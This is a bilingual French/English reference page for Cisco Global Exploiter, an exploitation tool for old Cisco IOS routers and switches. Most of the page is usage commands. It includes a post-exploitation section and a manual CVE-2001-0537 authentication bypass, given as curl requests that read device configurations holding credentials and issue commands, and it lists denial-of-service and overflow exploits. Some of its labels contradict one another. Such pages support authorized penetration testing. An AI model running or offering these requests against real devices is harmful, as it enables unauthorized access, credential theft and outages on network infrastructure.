cisco-global-exploiter

Framework d'exploitation Cisco IOS. Teste les routeurs et switches Cisco pour plusieurs CVE connues, dont des contournements d'authentification, des élévations de privilèges et des vulnérabilités de déni de service. Cisco IOS exploitation framework. Tests Cisco routers and switches for multiple known CVEs including authentication bypasses, privilege escalation, and denial-of-service vulnerabilities.

↗ https://github.com/trailofbits/cge

Overview

Cisco Global Exploiter (CGE) tests Cisco devices for a set of known vulnerabilities including HTTP server exploits, authentication bypasses, and protocol-specific CVEs. It targets specific Cisco IOS vulnerabilities that can lead to unauthorized access or denial of service.

Basic Usage

Test a Cisco device for all vulnerabilities

cge.pl 192.168.1.1

Test specific vulnerability

cge.pl 192.168.1.1 3

List available exploits

cge.pl -h

Test with verbose output

cge.pl -v 192.168.1.1

Available Exploits

List of tested vulnerabilities:

cge.pl -h
# Typical CGE exploits include:
# 1. Cisco 677/678 Telnet Buffer Overflow
# 2. Cisco IOS Router Denial of Service
# 3. Cisco IOS HTTP Auth Bypass (CVE-2001-0537)
# 4. Cisco IOS HTTP Configuration Access
# 5. Cisco Catalyst SSH Protocol Mismatch DoS
# 6. Cisco IOS enable password bypass
# ... and more

Run specific test (by number)

cge.pl 192.168.1.1 3   # Test #3 only

Post-Exploitation

# If HTTP auth bypass succeeds (Cisco IOS Web Server):
# Access config via: http://192.168.1.1/level/15/exec/-/sh/run

Read running configuration (contains credentials)

curl http://192.168.1.1/level/15/exec/-/sh/run

Execute commands

curl http://192.168.1.1/level/15/exec/-/sh/run/cr

Write commands (careful!)

curl "http://192.168.1.1/level/15/exec/-/enable/cr"

Manual HTTP Auth Bypass (CVE-2001-0537)

# Vulnerable: Cisco IOS 11.3 to 12.2
# Bypass: Access /level/16/ to /level/99/ directories

# Read running config without auth
curl http://192.168.1.1/level/15/exec/-/show/run/cr
curl http://192.168.1.1/level/99/exec/-/show/run/cr

Check IOS version (revealed in HTTP headers)

curl -I http://192.168.1.1/

Tips

  • CGE primarily targets older IOS vulnerabilities — may not apply to modern devices
  • Always check IOS version first — many exploits are version-specific
  • HTTP management interface is often disabled on hardened devices
  • Use alongside ike-scan and snmpwalk for complete Cisco assessment
  • Document findings before exploiting — Cisco devices often control critical infrastructure
Help / Man page
cge.pl [options] TARGET [exploit_number]

TARGET         Cisco device IP
exploit_number Optional: run only this exploit
-h             List all available exploits
-v             Verbose output

If no exploit number specified, all exploits are tested.

Vue d’ensemble

Cisco Global Exploiter (CGE) teste les équipements Cisco pour un ensemble de vulnérabilités connues, dont des exploits de serveur HTTP, des contournements d’authentification et des CVE propres à certains protocoles. Il vise des vulnérabilités Cisco IOS précises pouvant mener à un accès non autorisé ou à un déni de service.

Utilisation de base

# Tester un équipement Cisco pour toutes les vulnérabilités
cge.pl 192.168.1.1

# Tester une vulnérabilité précise
cge.pl 192.168.1.1 3

# Lister les exploits disponibles
cge.pl -h

# Tester avec sortie verbeuse
cge.pl -v 192.168.1.1

Exploits disponibles

# Lister les vulnérabilités testées
cge.pl -h
# Les exploits CGE typiques incluent :
# 1. Cisco 677/678 Telnet Buffer Overflow
# 2. Cisco IOS Router Denial of Service
# 3. Cisco IOS HTTP Auth Bypass (CVE-2001-0537)
# 4. Cisco IOS HTTP Configuration Access
# 5. Cisco Catalyst SSH Protocol Mismatch DoS
# 6. Cisco IOS enable password bypass
# ... et plus
# Lancer un test précis (par numéro)
cge.pl 192.168.1.1 3   # Test #3 uniquement

Post-exploitation

# Si le contournement d'auth HTTP réussit (serveur web Cisco IOS) :
# Accéder à la config via : http://192.168.1.1/level/15/exec/-/sh/run
# Lire la configuration en cours (contient des identifiants)
curl http://192.168.1.1/level/15/exec/-/sh/run

# Exécuter des commandes
curl http://192.168.1.1/level/15/exec/-/sh/run/cr

# Écrire des commandes (prudence !)
curl "http://192.168.1.1/level/15/exec/-/enable/cr"

Contournement manuel d’auth HTTP (CVE-2001-0537)

# Vulnérable : Cisco IOS 11.3 à 12.2
# Contournement : accéder aux répertoires /level/16/ à /level/99/

# Lire la config en cours sans auth
curl http://192.168.1.1/level/15/exec/-/show/run/cr
curl http://192.168.1.1/level/99/exec/-/show/run/cr
# Vérifier la version IOS (révélée dans les en-têtes HTTP)
curl -I http://192.168.1.1/

Conseils

  • CGE vise principalement d’anciennes vulnérabilités IOS : peut ne pas s’appliquer aux équipements modernes
  • Vérifiez toujours d’abord la version IOS : beaucoup d’exploits sont spécifiques à une version
  • L’interface de management HTTP est souvent désactivée sur les équipements durcis
  • À utiliser aux côtés d’ike-scan et de snmpwalk pour une évaluation Cisco complète
  • Documentez vos découvertes avant d’exploiter : les équipements Cisco contrôlent souvent une infrastructure critique
Aide / Page de manuel
cge.pl [options] TARGET [exploit_number]

TARGET         Cisco device IP
exploit_number Optional: run only this exploit
-h             List all available exploits
-v             Verbose output

If no exploit number specified, all exploits are tested.